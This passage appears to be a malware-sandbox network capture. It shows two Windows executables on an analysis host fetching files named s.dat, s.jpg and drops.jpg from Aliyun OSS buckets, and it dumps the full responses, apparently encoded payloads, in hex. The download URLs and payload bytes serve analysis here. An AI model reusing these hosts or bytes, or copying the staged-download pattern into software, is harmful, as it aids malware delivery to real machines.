                                                                        2025-01-14 04:11:06 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                                                        Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                                                        Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                                                        2025-01-14 04:11:06 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                                                        Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.11.204976039.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:15 UTC105OUTGET /s.dat HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:15 UTC559INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:15 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 28272
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3E30AD071363685C603
                                                                        Accept-Ranges: bytes
                                                                        ETag: "61FFFB9E002BEE68EDDA23702F055257"
                                                                        Last-Modified: Tue, 14 Jan 2025 04:10:58 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 423203561054321900
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000113
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: Yf/7ngAr7mjt2iNwLwVSVw==
                                                                        x-oss-server-time: 31
                                                                        2025-01-14 04:11:15 UTC3537INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                                                        Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92
                                                                        Data Ascii: ##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c
                                                                        Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b
                                                                        Data Ascii: JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                                                        Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                        Data Ascii: ,$LDld=5}u]U
                                                                        2025-01-14 04:11:15 UTC4096INData Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed
                                                                        Data Ascii: <EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                                                        2025-01-14 04:11:15 UTC159INData Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 b8 86 a5 37
                                                                        Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS7


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.11.204976139.103.20.174436476C:\Users\user\Desktop\183643586-388657435.07.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:11:18 UTC105OUTGET /s.jpg HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        User-Agent: Do
                                                                        Host: vien3h.oss-cn-beijing.aliyuncs.com
                                                                        2025-01-14 04:11:19 UTC544INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:11:18 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 8299
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E3E66AD6D53635B032C0
                                                                        Accept-Ranges: bytes
                                                                        ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                                                        Last-Modified: Mon, 13 Jan 2025 12:21:18 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 692387538176721524
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000104
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                                                        x-oss-server-time: 10
                                                                        2025-01-14 04:11:19 UTC3552INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                                        Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                                        2025-01-14 04:11:19 UTC4096INData Raw: 06 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43
                                                                        Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                                                        2025-01-14 04:11:19 UTC651INData Raw: d6 f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84
                                                                        Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.11.2049762118.178.60.94431016C:\Users\user\Documents\ieiUC1.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:12:14 UTC114OUTGET /drops.jpg HTTP/1.1
                                                                        User-Agent: GetData
                                                                        Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:12:14 UTC545INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:12:14 GMT
                                                                        Content-Type: image/jpeg
                                                                        Content-Length: 37274
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E41E09E59835368E7B4F
                                                                        Accept-Ranges: bytes
                                                                        ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                                        Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 9193697774326766004
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                                        x-oss-server-time: 4
                                                                        2025-01-14 04:12:14 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                                        Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                                        2025-01-14 04:12:14 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                                        Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                                        2025-01-14 04:12:14 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                                        Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                                        2025-01-14 04:12:14 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                                        Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
